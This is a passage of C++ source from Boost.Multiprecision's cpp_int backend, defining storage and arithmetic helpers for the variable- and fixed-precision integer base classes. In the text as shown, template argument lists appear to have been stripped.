: m_data(i), m_limbs(i < 0 ? (static_cast(boost::multiprecision::detail::unsigned_abs(i)) > static_cast(max_limb_value) ? 2 : 1) : (i > max_limb_value ? 2 : 1)),\r\n m_sign(i < 0), m_internal(true) { }\r\n#endif\r\n //\r\n // Helper functions for getting at our internal data, and manipulating storage:\r\n //\r\n BOOST_MP_FORCEINLINE allocator_type& allocator() BOOST_NOEXCEPT { return *this; }\r\n BOOST_MP_FORCEINLINE const allocator_type& allocator()const BOOST_NOEXCEPT { return *this; }\r\n BOOST_MP_FORCEINLINE unsigned size()const BOOST_NOEXCEPT { return m_limbs; }\r\n BOOST_MP_FORCEINLINE limb_pointer limbs() BOOST_NOEXCEPT { return m_internal ? m_data.la : m_data.ld.data; }\r\n BOOST_MP_FORCEINLINE const_limb_pointer limbs()const BOOST_NOEXCEPT { return m_internal ? m_data.la : m_data.ld.data; }\r\n BOOST_MP_FORCEINLINE unsigned capacity()const BOOST_NOEXCEPT { return m_internal ? internal_limb_count : m_data.ld.capacity; }\r\n BOOST_MP_FORCEINLINE bool sign()const BOOST_NOEXCEPT { return m_sign; }\r\n void sign(bool b) BOOST_NOEXCEPT\r\n {\r\n m_sign = b;\r\n // Check for zero value:\r\n if(m_sign && (m_limbs == 1))\r\n {\r\n if(limbs()[0] == 0)\r\n m_sign = false;\r\n }\r\n }\r\n void resize(unsigned new_size, unsigned min_size)\r\n {\r\n static const unsigned max_limbs = MaxBits / (CHAR_BIT * sizeof(limb_type)) + ((MaxBits % (CHAR_BIT * sizeof(limb_type))) ? 1 : 0);\r\n // We never resize beyond MaxSize:\r\n if(new_size > max_limbs)\r\n new_size = max_limbs;\r\n detail::verify_new_size(new_size, min_size, checked_type());\r\n // See if we have enough capacity already:\r\n unsigned cap = capacity();\r\n if(new_size > cap)\r\n {\r\n // Allocate a new buffer and copy everything over:\r\n cap = (std::min)((std::max)(cap * 4, new_size), max_limbs);\r\n limb_pointer pl = allocator().allocate(cap);\r\n std::memcpy(pl, limbs(), size() * sizeof(limbs()[0]));\r\n if(!m_internal)\r\n allocator().deallocate(limbs(), capacity());\r\n else\r\n m_internal = false;\r\n m_limbs = new_size;\r\n m_data.ld.capacity = cap;\r\n m_data.ld.data = pl;\r\n }\r\n else\r\n {\r\n m_limbs = new_size;\r\n }\r\n }\r\n BOOST_MP_FORCEINLINE void normalize() BOOST_NOEXCEPT\r\n {\r\n limb_pointer p = limbs();\r\n while((m_limbs-1) && !p[m_limbs - 1])--m_limbs;\r\n }\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base() BOOST_NOEXCEPT : m_data(), m_limbs(1), m_sign(false), m_internal(true) {}\r\n BOOST_MP_FORCEINLINE cpp_int_base(const cpp_int_base& o) : allocator_type(o), m_limbs(0), m_internal(true)\r\n {\r\n resize(o.size(), o.size());\r\n std::memcpy(limbs(), o.limbs(), o.size() * sizeof(limbs()[0]));\r\n m_sign = o.m_sign;\r\n }\r\n#ifndef BOOST_NO_CXX11_RVALUE_REFERENCES\r\n cpp_int_base(cpp_int_base&& o)\r\n : allocator_type(static_cast(o)), m_limbs(o.m_limbs), m_sign(o.m_sign), m_internal(o.m_internal)\r\n {\r\n if(m_internal)\r\n {\r\n std::memcpy(limbs(), o.limbs(), o.size() * sizeof(limbs()[0]));\r\n }\r\n else\r\n {\r\n m_data.ld = o.m_data.ld;\r\n o.m_limbs = 0;\r\n o.m_internal = true;\r\n }\r\n }\r\n cpp_int_base& operator = (cpp_int_base&& o) BOOST_NOEXCEPT\r\n {\r\n if(!m_internal)\r\n allocator().deallocate(m_data.ld.data, m_data.ld.capacity);\r\n *static_cast(this) = static_cast(o);\r\n m_limbs = o.m_limbs;\r\n m_sign = o.m_sign;\r\n m_internal = o.m_internal;\r\n if(m_internal)\r\n {\r\n std::memcpy(limbs(), o.limbs(), o.size() * sizeof(limbs()[0]));\r\n }\r\n else\r\n {\r\n m_data.ld = o.m_data.ld;\r\n o.m_limbs = 0;\r\n o.m_internal = true;\r\n }\r\n return *this;\r\n }\r\n#endif\r\n BOOST_MP_FORCEINLINE ~cpp_int_base() BOOST_NOEXCEPT\r\n {\r\n if(!m_internal)\r\n allocator().deallocate(limbs(), capacity());\r\n }\r\n void assign(const cpp_int_base& o)\r\n {\r\n if(this != &o)\r\n {\r\n static_cast(*this) = static_cast(o);\r\n m_limbs = 0;\r\n resize(o.size(), o.size());\r\n std::memcpy(limbs(), o.limbs(), o.size() * sizeof(limbs()[0]));\r\n m_sign = o.m_sign;\r\n }\r\n }\r\n BOOST_MP_FORCEINLINE void negate() BOOST_NOEXCEPT\r\n {\r\n m_sign = !m_sign;\r\n // Check for zero value:\r\n if(m_sign && (m_limbs == 1))\r\n {\r\n if(limbs()[0] == 0)\r\n m_sign = false;\r\n }\r\n }\r\n BOOST_MP_FORCEINLINE bool isneg()const BOOST_NOEXCEPT\r\n {\r\n return m_sign;\r\n }\r\n BOOST_MP_FORCEINLINE void do_swap(cpp_int_base& o) BOOST_NOEXCEPT\r\n {\r\n std::swap(m_data, o.m_data);\r\n std::swap(m_sign, o.m_sign);\r\n std::swap(m_internal, o.m_internal);\r\n std::swap(m_limbs, o.m_limbs);\r\n }\r\nprotected:\r\n template \r\n void check_in_range(const A&) BOOST_NOEXCEPT {}\r\n};\r\n\r\n#ifndef BOOST_NO_INCLASS_MEMBER_INITIALIZATION\r\n\r\ntemplate \r\nconst unsigned cpp_int_base::limb_bits;\r\ntemplate \r\nconst limb_type cpp_int_base::max_limb_value;\r\ntemplate \r\nconst limb_type cpp_int_base::sign_bit_mask;\r\ntemplate \r\nconst unsigned cpp_int_base::internal_limb_count;\r\ntemplate \r\nconst bool cpp_int_base::variable;\r\n\r\n#endif\r\n\r\ntemplate \r\nstruct cpp_int_base : private Allocator::template rebind::other\r\n{\r\n //\r\n // There is currently no support for unsigned arbitrary precision arithmetic, largely\r\n // because it's not clear what subtraction should do:\r\n //\r\n BOOST_STATIC_ASSERT_MSG(((sizeof(Allocator) == 0) && !is_void::value), \"There is curently no support for unsigned arbitrary precision integers.\");\r\n};\r\n//\r\n// Fixed precision (i.e. no allocator), signed-magnitude type with limb-usage count:\r\n//\r\ntemplate \r\nstruct cpp_int_base\r\n{\r\n typedef limb_type* limb_pointer;\r\n typedef const limb_type* const_limb_pointer;\r\n typedef mpl::int_ checked_type;\r\n\r\n //\r\n // Interface invariants:\r\n //\r\n BOOST_STATIC_ASSERT_MSG(MinBits > sizeof(double_limb_type) * CHAR_BIT, \"Template parameter MinBits is inconsistent with the parameter trivial - did you mistakingly try to override the trivial parameter?\");\r\n\r\npublic:\r\n BOOST_STATIC_CONSTANT(unsigned, limb_bits = sizeof(limb_type) * CHAR_BIT);\r\n BOOST_STATIC_CONSTANT(limb_type, max_limb_value = ~static_cast(0u));\r\n BOOST_STATIC_CONSTANT(limb_type, sign_bit_mask = static_cast(1u) << (limb_bits - 1));\r\n BOOST_STATIC_CONSTANT(unsigned, internal_limb_count = MinBits / limb_bits + ((MinBits % limb_bits) ? 1 : 0));\r\n BOOST_STATIC_CONSTANT(bool, variable = false);\r\n BOOST_STATIC_CONSTANT(limb_type, upper_limb_mask = (MinBits % limb_bits) ? (limb_type(1) << (MinBits % limb_bits)) -1 : (~limb_type(0)));\r\n BOOST_STATIC_ASSERT_MSG(internal_limb_count >= 2, \"A fixed precision integer type must have at least 2 limbs\");\r\n\r\nprivate:\r\n union data_type{\r\n limb_type m_data[internal_limb_count];\r\n limb_type m_first_limb;\r\n double_limb_type m_double_first_limb;\r\n\r\n BOOST_CONSTEXPR data_type() : m_first_limb(0) {}\r\n BOOST_CONSTEXPR data_type(limb_type i) : m_first_limb(i) {}\r\n BOOST_CONSTEXPR data_type(double_limb_type i) : m_double_first_limb(i) {}\r\n#if defined(BOOST_MP_USER_DEFINED_LITERALS)\r\n template \r\n BOOST_CONSTEXPR data_type(literals::detail::value_pack) : m_data{ VALUES... } {}\r\n#endif\r\n } m_wrapper;\r\n boost::uint16_t m_limbs;\r\n bool m_sign;\r\n\r\npublic:\r\n //\r\n // Direct construction:\r\n //\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(limb_type i)BOOST_NOEXCEPT\r\n : m_wrapper(i), m_limbs(1), m_sign(false) {}\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(signed_limb_type i)BOOST_NOEXCEPT\r\n : m_wrapper(limb_type(i < 0 ? static_cast(-static_cast(i)) : i)), m_limbs(1), m_sign(i < 0) {}\r\n#if defined(BOOST_LITTLE_ENDIAN) && !defined(BOOST_MP_TEST_NO_LE)\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(double_limb_type i)BOOST_NOEXCEPT\r\n : m_wrapper(i), m_limbs(i > max_limb_value ? 2 : 1), m_sign(false) {}\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(signed_double_limb_type i)BOOST_NOEXCEPT\r\n : m_wrapper(double_limb_type(i < 0 ? static_cast(boost::multiprecision::detail::unsigned_abs(i)) : i)),\r\n m_limbs(i < 0 ? (static_cast(boost::multiprecision::detail::unsigned_abs(i)) > max_limb_value ? 2 : 1) : (i > max_limb_value ? 2 : 1)),\r\n m_sign(i < 0) {}\r\n#endif\r\n#if defined(BOOST_MP_USER_DEFINED_LITERALS)\r\n template \r\n BOOST_CONSTEXPR cpp_int_base(literals::detail::value_pack i)\r\n : m_wrapper(i), m_limbs(sizeof...(VALUES)), m_sign(false) {}\r\n BOOST_CONSTEXPR cpp_int_base(literals::detail::value_pack<> i)\r\n : m_wrapper(i), m_limbs(1), m_sign(false) {}\r\n BOOST_CONSTEXPR cpp_int_base(const cpp_int_base& a, const literals::detail::negate_tag&)\r\n : m_wrapper(a.m_wrapper), m_limbs(a.m_limbs), m_sign((a.m_limbs == 1) && (*a.limbs() == 0) ? false : !a.m_sign) {}\r\n#endif\r\n //\r\n // Helper functions for getting at our internal data, and manipulating storage:\r\n //\r\n BOOST_MP_FORCEINLINE unsigned size()const BOOST_NOEXCEPT { return m_limbs; }\r\n BOOST_MP_FORCEINLINE limb_pointer limbs() BOOST_NOEXCEPT { return m_wrapper.m_data; }\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR const_limb_pointer limbs()const BOOST_NOEXCEPT { return m_wrapper.m_data; }\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR bool sign()const BOOST_NOEXCEPT { return m_sign; }\r\n BOOST_MP_FORCEINLINE void sign(bool b) BOOST_NOEXCEPT\r\n {\r\n m_sign = b;\r\n // Check for zero value:\r\n if(m_sign && (m_limbs == 1))\r\n {\r\n if(limbs()[0] == 0)\r\n m_sign = false;\r\n }\r\n }\r\n BOOST_MP_FORCEINLINE void resize(unsigned new_size, unsigned min_size) BOOST_MP_NOEXCEPT_IF((Checked == unchecked))\r\n {\r\n m_limbs = static_cast((std::min)(new_size, internal_limb_count));\r\n detail::verify_new_size(m_limbs, min_size, checked_type());\r\n }\r\n BOOST_MP_FORCEINLINE void normalize() BOOST_MP_NOEXCEPT_IF((Checked == unchecked))\r\n {\r\n limb_pointer p = limbs();\r\n detail::verify_limb_mask(m_limbs == internal_limb_count, p[internal_limb_count-1], upper_limb_mask, checked_type());\r\n p[internal_limb_count-1] &= upper_limb_mask;\r\n while((m_limbs-1) && !p[m_limbs - 1])--m_limbs;\r\n if((m_limbs == 1) && (!*p)) m_sign = false; // zero is always unsigned\r\n }\r\n\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base()BOOST_NOEXCEPT : m_wrapper(limb_type(0u)), m_limbs(1), m_sign(false) {}\r\n // Not defaulted, it breaks constexpr support in the Intel compiler for some reason:\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(const cpp_int_base& o)BOOST_NOEXCEPT\r\n : m_wrapper(o.m_wrapper), m_limbs(o.m_limbs), m_sign(o.m_sign) {}\r\n // Defaulted functions:\r\n //~cpp_int_base() BOOST_NOEXCEPT {}\r\n\r\n void assign(const cpp_int_base& o) BOOST_NOEXCEPT\r\n {\r\n if(this != &o)\r\n {\r\n m_limbs = o.m_limbs;\r\n std::memcpy(limbs(), o.limbs(), o.size() * sizeof(o.limbs()[0]));\r\n m_sign = o.m_sign;\r\n }\r\n }\r\n BOOST_MP_FORCEINLINE void negate() BOOST_NOEXCEPT\r\n {\r\n m_sign = !m_sign;\r\n // Check for zero value:\r\n if(m_sign && (m_limbs == 1))\r\n {\r\n if(limbs()[0] == 0)\r\n m_sign = false;\r\n }\r\n }\r\n BOOST_MP_FORCEINLINE bool isneg()const BOOST_NOEXCEPT\r\n {\r\n return m_sign;\r\n }\r\n BOOST_MP_FORCEINLINE void do_swap(cpp_int_base& o) BOOST_NOEXCEPT\r\n {\r\n for(unsigned i = 0; i < (std::max)(size(), o.size()); ++i)\r\n std::swap(m_wrapper.m_data[i], o.m_wrapper.m_data[i]);\r\n std::swap(m_sign, o.m_sign);\r\n std::swap(m_limbs, o.m_limbs);\r\n }\r\nprotected:\r\n template \r\n void check_in_range(const A&) BOOST_NOEXCEPT {}\r\n};\r\n#ifndef BOOST_NO_INCLASS_MEMBER_INITIALIZATION\r\n\r\ntemplate \r\nconst unsigned cpp_int_base::limb_bits;\r\ntemplate \r\nconst limb_type cpp_int_base::max_limb_value;\r\ntemplate \r\nconst limb_type cpp_int_base::sign_bit_mask;\r\ntemplate \r\nconst unsigned cpp_int_base::internal_limb_count;\r\ntemplate \r\nconst bool cpp_int_base::variable;\r\n\r\n#endif\r\n//\r\n// Fixed precision (i.e. no allocator), unsigned type with limb-usage count:\r\n//\r\ntemplate \r\nstruct cpp_int_base\r\n{\r\n typedef limb_type* limb_pointer;\r\n typedef const limb_type* const_limb_pointer;\r\n typedef mpl::int_ checked_type;\r\n\r\n //\r\n // Interface invariants:\r\n //\r\n BOOST_STATIC_ASSERT_MSG(MinBits > sizeof(double_limb_type) * CHAR_BIT, \"Template parameter MinBits is inconsistent with the parameter trivial - did you mistakingly try to override the trivial parameter?\");\r\n\r\npublic:\r\n BOOST_STATIC_CONSTANT(unsigned, limb_bits = sizeof(limb_type) * CHAR_BIT);\r\n BOOST_STATIC_CONSTANT(limb_type, max_limb_value = ~static_cast(0u));\r\n BOOST_STATIC_CONSTANT(limb_type, sign_bit_mask = static_cast(1u) << (limb_bits - 1));\r\n BOOST_STATIC_CONSTANT(unsigned, internal_limb_count = MinBits / limb_bits + ((MinBits % limb_bits) ? 1 : 0));\r\n BOOST_STATIC_CONSTANT(bool, variable = false);\r\n BOOST_STATIC_CONSTANT(limb_type, upper_limb_mask = (MinBits % limb_bits) ? (limb_type(1) << (MinBits % limb_bits)) -1 : (~limb_type(0)));\r\n BOOST_STATIC_ASSERT_MSG(internal_limb_count >= 2, \"A fixed precision integer type must have at least 2 limbs\");\r\n\r\nprivate:\r\n union data_type{\r\n limb_type m_data[internal_limb_count];\r\n limb_type m_first_limb;\r\n double_limb_type m_double_first_limb;\r\n\r\n BOOST_CONSTEXPR data_type() : m_first_limb(0) {}\r\n BOOST_CONSTEXPR data_type(limb_type i) : m_first_limb(i) {}\r\n BOOST_CONSTEXPR data_type(double_limb_type i) : m_double_first_limb(i) {}\r\n#if defined(BOOST_MP_USER_DEFINED_LITERALS)\r\n template \r\n BOOST_CONSTEXPR data_type(literals::detail::value_pack) : m_data{ VALUES... } {}\r\n#endif\r\n } m_wrapper;\r\n limb_type m_limbs;\r\n\r\npublic:\r\n //\r\n // Direct construction:\r\n //\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(limb_type i)BOOST_NOEXCEPT\r\n : m_wrapper(i), m_limbs(1) {}\r\n BOOST_MP_FORCEINLINE cpp_int_base(signed_limb_type i)BOOST_MP_NOEXCEPT_IF((Checked == unchecked))\r\n : m_wrapper(limb_type(i < 0 ? static_cast(-static_cast(i)) : i)), m_limbs(1) { if(i < 0) negate(); }\r\n#if defined(BOOST_LITTLE_ENDIAN) && !defined(BOOST_MP_TEST_NO_LE)\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(double_limb_type i)BOOST_NOEXCEPT\r\n : m_wrapper(i), m_limbs(i > max_limb_value ? 2 : 1) {}\r\n BOOST_MP_FORCEINLINE cpp_int_base(signed_double_limb_type i)BOOST_MP_NOEXCEPT_IF((Checked == unchecked))\r\n : m_wrapper(double_limb_type(i < 0 ? static_cast(boost::multiprecision::detail::unsigned_abs(i)) : i)), \r\n m_limbs(i < 0 ? (static_cast(boost::multiprecision::detail::unsigned_abs(i)) > max_limb_value ? 2 : 1) : (i > max_limb_value ? 2 : 1)) \r\n {\r\n if (i < 0) negate();\r\n }\r\n#endif\r\n#if defined(BOOST_MP_USER_DEFINED_LITERALS)\r\n template \r\n BOOST_CONSTEXPR cpp_int_base(literals::detail::value_pack i)\r\n : m_wrapper(i), m_limbs(sizeof...(VALUES)) {}\r\n BOOST_CONSTEXPR cpp_int_base(literals::detail::value_pack<>)\r\n : m_wrapper(static_cast(0u)), m_limbs(1) {}\r\n#endif\r\n //\r\n // Helper functions for getting at our internal data, and manipulating storage:\r\n //\r\n BOOST_MP_FORCEINLINE unsigned size()const BOOST_NOEXCEPT { return m_limbs; }\r\n BOOST_MP_FORCEINLINE limb_pointer limbs() BOOST_NOEXCEPT { return m_wrapper.m_data; }\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR const_limb_pointer limbs()const BOOST_NOEXCEPT { return m_wrapper.m_data; }\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR bool sign()const BOOST_NOEXCEPT { return false; }\r\n BOOST_MP_FORCEINLINE void sign(bool b) BOOST_MP_NOEXCEPT_IF((Checked == unchecked)) { if(b) negate(); }\r\n BOOST_MP_FORCEINLINE void resize(unsigned new_size, unsigned min_size) BOOST_MP_NOEXCEPT_IF((Checked == unchecked))\r\n {\r\n m_limbs = (std::min)(new_size, internal_limb_count);\r\n detail::verify_new_size(m_limbs, min_size, checked_type());\r\n }\r\n BOOST_MP_FORCEINLINE void normalize() BOOST_MP_NOEXCEPT_IF((Checked == unchecked))\r\n {\r\n limb_pointer p = limbs();\r\n detail::verify_limb_mask(m_limbs == internal_limb_count, p[internal_limb_count-1], upper_limb_mask, checked_type());\r\n p[internal_limb_count-1] &= upper_limb_mask;\r\n while((m_limbs-1) && !p[m_limbs - 1])--m_limbs;\r\n }\r\n\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base() BOOST_NOEXCEPT\r\n : m_wrapper(limb_type(0u)), m_limbs(1) {}\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(const cpp_int_base& o) BOOST_NOEXCEPT\r\n : m_wrapper(o.m_wrapper), m_limbs(o.m_limbs) {}\r\n // Defaulted functions:\r\n //~cpp_int_base() BOOST_NOEXCEPT {}\r\n\r\n BOOST_MP_FORCEINLINE void assign(const cpp_int_base& o) BOOST_NOEXCEPT\r\n {\r\n if(this != &o)\r\n {\r\n m_limbs = o.m_limbs;\r\n std::memcpy(limbs(), o.limbs(), o.size() * sizeof(limbs()[0]));\r\n }\r\n }\r\nprivate:\r\n void check_negate(const mpl::int_&)\r\n {\r\n BOOST_THROW_EXCEPTION(std::range_error(\"Attempt to negate an unsigned number.\"));\r\n }\r\n void check_negate(const mpl::int_&){}\r\npublic:\r\n void negate() BOOST_MP_NOEXCEPT_IF((Checked == unchecked))\r\n {\r\n // Not so much a negate as a complement - this gets called when subtraction\r\n // would result in a \"negative\" number:\r\n unsigned i;\r\n if((m_limbs == 1) && (m_wrapper.m_data[0] == 0))\r\n return; // negating zero is always zero, and always OK.\r\n check_negate(checked_type());\r\n for(i = m_limbs; i < internal_limb_count; ++i)\r\n m_wrapper.m_data[i] = 0;\r\n m_limbs = internal_limb_count;\r\n for(i = 0; i < internal_limb_count; ++i)\r\n m_wrapper.m_data[i] = ~m_wrapper.m_data[i];\r\n normalize();\r\n eval_increment(static_cast& >(*this));\r\n }\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR bool isneg()const BOOST_NOEXCEPT\r\n {\r\n return false;\r\n }\r\n BOOST_MP_FORCEINLINE void do_swap(cpp_int_base& o) BOOST_NOEXCEPT\r\n {\r\n for(unsigned i = 0; i < (std::max)(size(), o.size()); ++i)\r\n std::swap(m_wrapper.m_data[i], o.m_wrapper.m_data[i]);\r\n std::swap(m_limbs, o.m_limbs);\r\n }\r\nprotected:\r\n template \r\n void check_in_range(const A&) BOOST_NOEXCEPT {}\r\n};\r\n#ifndef BOOST_NO_INCLASS_MEMBER_INITIALIZATION\r\n\r\ntemplate \r\nconst unsigned cpp_int_base::limb_bits;\r\ntemplate \r\nconst limb_type cpp_int_base::max_limb_value;\r\ntemplate \r\nconst limb_type cpp_int_base::sign_bit_mask;\r\ntemplate \r\nconst unsigned cpp_int_base::internal_limb_count;\r\ntemplate \r\nconst bool cpp_int_base::variable;\r\n\r\n#endif\r\n//\r\n// Traits classes to figure out a native type with N bits, these vary from boost::uint_t only\r\n// because some platforms have native integer types longer than boost::long_long_type, \"really boost::long_long_type\" anyone??\r\n//\r\ntemplate \r\nstruct trivial_limb_type_imp\r\n{\r\n typedef double_limb_type type;\r\n};\r\n\r\ntemplate \r\nstruct trivial_limb_type_imp\r\n{\r\n typedef typename boost::uint_t::least type;\r\n};\r\n\r\ntemplate \r\nstruct trivial_limb_type : public trivial_limb_type_imp {};\r\n//\r\n// Backend for fixed precision signed-magnitude type which will fit entirely inside a \"double_limb_type\":\r\n//\r\ntemplate \r\nstruct cpp_int_base\r\n{\r\n typedef typename trivial_limb_type::type local_limb_type;\r\n typedef local_limb_type* limb_pointer;\r\n typedef const local_limb_type* const_limb_pointer;\r\n typedef mpl::int_ checked_type;\r\nprotected:\r\n BOOST_STATIC_CONSTANT(unsigned, limb_bits = sizeof(local_limb_type) * CHAR_BIT);\r\n BOOST_STATIC_CONSTANT(local_limb_type, limb_mask = (MinBits < limb_bits) ? local_limb_type((local_limb_type(~local_limb_type(0))) >> (limb_bits - MinBits)) : local_limb_type(~local_limb_type(0)));\r\nprivate:\r\n local_limb_type m_data;\r\n bool m_sign;\r\n\r\n //\r\n // Interface invariants:\r\n //\r\n BOOST_STATIC_ASSERT_MSG(MinBits <= sizeof(double_limb_type) * CHAR_BIT, \"Template parameter MinBits is inconsistent with the parameter trivial - did you mistakingly try to override the trivial parameter?\");\r\nprotected:\r\n template \r\n typename boost::disable_if_c::value || (std::numeric_limits::is_specialized && (std::numeric_limits::digits <= (int)MinBits))>::type\r\n check_in_range(T val, const mpl::int_&)\r\n {\r\n typedef typename common_type::type, local_limb_type>::type common_type;\r\n\r\n if(static_cast(boost::multiprecision::detail::unsigned_abs(val)) > static_cast(limb_mask))\r\n BOOST_THROW_EXCEPTION(std::range_error(\"The argument to a cpp_int constructor exceeded the largest value it can represent.\"));\r\n }\r\n template \r\n typename boost::disable_if_c::value || (std::numeric_limits::is_specialized && (std::numeric_limits::digits <= (int)MinBits))>::type\r\n check_in_range(T val, const mpl::int_&)\r\n {\r\n using std::abs;\r\n typedef typename common_type::type common_type;\r\n\r\n if (static_cast(abs(val)) > static_cast(limb_mask))\r\n BOOST_THROW_EXCEPTION(std::range_error(\"The argument to a cpp_int constructor exceeded the largest value it can represent.\"));\r\n }\r\n template \r\n void check_in_range(T, const mpl::int_&) BOOST_NOEXCEPT {}\r\n\r\n template \r\n void check_in_range(T val) BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().check_in_range(std::declval(), checked_type())))\r\n {\r\n check_in_range(val, checked_type());\r\n }\r\n\r\npublic:\r\n //\r\n // Direct construction:\r\n //\r\n template \r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(SI i, typename boost::enable_if_c::value && (Checked == unchecked) >::type const* = 0) BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().check_in_range(std::declval())))\r\n : m_data(i < 0 ? static_cast(static_cast::type>(boost::multiprecision::detail::unsigned_abs(i)) & limb_mask) : static_cast(i & limb_mask)), m_sign(i < 0) {}\r\n template \r\n BOOST_MP_FORCEINLINE cpp_int_base(SI i, typename boost::enable_if_c::value && (Checked == checked) >::type const* = 0) BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().check_in_range(std::declval())))\r\n : m_data(i < 0 ? (static_cast(static_cast::type>(boost::multiprecision::detail::unsigned_abs(i)) & limb_mask)) : static_cast(i & limb_mask)), m_sign(i < 0)\r\n { check_in_range(i); }\r\n template \r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(UI i, typename boost::enable_if_c::value && (Checked == unchecked)>::type const* = 0) BOOST_NOEXCEPT\r\n : m_data(static_cast(i) & limb_mask), m_sign(false) {}\r\n template \r\n BOOST_MP_FORCEINLINE cpp_int_base(UI i, typename boost::enable_if_c::value && (Checked == checked)>::type const* = 0) BOOST_MP_NOEXCEPT_IF(noexcept(std::declval().check_in_range(std::declval())))\r\n : m_data(static_cast(i) & limb_mask), m_sign(false) { check_in_range(i); }\r\n template \r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(F i, typename boost::enable_if_c::value && (Checked == unchecked)>::type const* = 0) BOOST_NOEXCEPT\r\n : m_data(static_cast(std::fabs(i)) & limb_mask), m_sign(i < 0) {}\r\n template \r\n BOOST_MP_FORCEINLINE cpp_int_base(F i, typename boost::enable_if_c::value && (Checked == checked)>::type const* = 0)\r\n : m_data(static_cast(std::fabs(i)) & limb_mask), m_sign(i < 0) { check_in_range(i); }\r\n#if defined(BOOST_MP_USER_DEFINED_LITERALS)\r\n BOOST_CONSTEXPR cpp_int_base(literals::detail::value_pack<>) BOOST_NOEXCEPT\r\n : m_data(static_cast(0u)), m_sign(false) {}\r\n template \r\n BOOST_CONSTEXPR cpp_int_base(literals::detail::value_pack)BOOST_NOEXCEPT\r\n : m_data(static_cast(a)), m_sign(false) {}\r\n template \r\n BOOST_CONSTEXPR cpp_int_base(literals::detail::value_pack)BOOST_NOEXCEPT\r\n : m_data(static_cast(a) | (static_cast(b) << bits_per_limb)), m_sign(false) {}\r\n BOOST_CONSTEXPR cpp_int_base(const cpp_int_base& a, const literals::detail::negate_tag&)BOOST_NOEXCEPT\r\n : m_data(a.m_data), m_sign(a.m_data ? !a.m_sign : false) {}\r\n#endif\r\n //\r\n // Helper functions for getting at our internal data, and manipulating storage:\r\n //\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR unsigned size()const BOOST_NOEXCEPT { return 1; }\r\n BOOST_MP_FORCEINLINE limb_pointer limbs() BOOST_NOEXCEPT { return &m_data; }\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR const_limb_pointer limbs()const BOOST_NOEXCEPT { return &m_data; }\r\n BOOST_MP_FORCEINLINE bool sign()const BOOST_NOEXCEPT { return m_sign; }\r\n BOOST_MP_FORCEINLINE void sign(bool b) BOOST_NOEXCEPT\r\n {\r\n m_sign = b;\r\n // Check for zero value:\r\n if(m_sign && !m_data)\r\n {\r\n m_sign = false;\r\n }\r\n }\r\n BOOST_MP_FORCEINLINE void resize(unsigned new_size, unsigned min_size)\r\n {\r\n detail::verify_new_size(2, min_size, checked_type());\r\n }\r\n BOOST_MP_FORCEINLINE void normalize() BOOST_MP_NOEXCEPT_IF((Checked == unchecked))\r\n {\r\n if(!m_data)\r\n m_sign = false; // zero is always unsigned\r\n detail::verify_limb_mask(true, m_data, limb_mask, checked_type());\r\n m_data &= limb_mask;\r\n }\r\n\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base() BOOST_NOEXCEPT : m_data(0), m_sign(false) {}\r\n BOOST_MP_FORCEINLINE BOOST_CONSTEXPR cpp_int_base(const cpp_int_base& o) BOOST_NOEXCEPT\r\n : m_data(o.m_data), m_sign(o.m_sign) {}\r\n //~cpp_int_base() BOOST_NOEXCEPT {}\r\n BOOST_MP_FORCEINLINE void assign(const cpp_int_base& o) BOOST_NOEXCEPT\r\n {\r\n m_data = o.m_data;\r\n m_sign = o.m_sign;\r\n }\r\n BOOST_MP_FORCEINLINE void negate() BOOST_NOEXCEPT\r\n {\r\n m_sign = !m_sign;\r\n // Check for zero value:\r\n if(m_data == 0)\r\n {\r\n m_sign = false;\r\n }\r\n }\r\n BOOST_MP_FORCEINLINE bool isneg()const BOOST_NOEXCEPT\r\n {\r\n return m_sign;\r\n }\r\n BOOST_MP_FORCEINLINE void do_swap(cpp_int_base& o) BOOST_NOEXCEPT\r\n {\r\n std::swap(m_sign, o.m_sign);\r\n std::swap(m_data, o.m_data);\r\n }\r\n};\r\n//\r\n// Backend for unsigned fixed precision (i.e. no allocator) type which will fit entirely inside a \"double_limb_type\":\r\n//\r\ntemplate \r\nstruct cpp_int_base\r\n{\r\n typedef typename trivial_limb_type::type local_limb_type;\r\n typedef local_limb_type* limb_pointer;\r\n typedef const local_limb_type* const_limb_pointer;\r\nprivate:\r\n BOOST_STATIC_CONSTANT(unsigned, limb_bits = sizeof(local_limb_type) * CHAR_BIT);\r\n BOOST_STATIC_CONSTANT(local_limb_type, limb_mask = limb_bits != MinBits ? \r\n static_cast(static_cast(~local_limb_type(0)) >> (limb_bits - MinBits))\r\n : static_cast(~local_limb_type(0)));\r\n\r\n local_limb_type m_data;\r\n\r\n typedef mpl::int_ checked_type;\r\n\r\n //\r\n // Interface invariants:\r\n //\r\n BOOST_STATIC_ASSERT_MSG(MinBits <= sizeof(double_limb_type) * CHAR_BIT, \"Template parameter MinBits is inconsistent with the parameter trivial - did you mistakingly try to override the trivial parameter?\");\r\nprotected:\r\n template \r\n typename boost::disable_if_c::is_specialized && (std::numeric_limits::digits <= 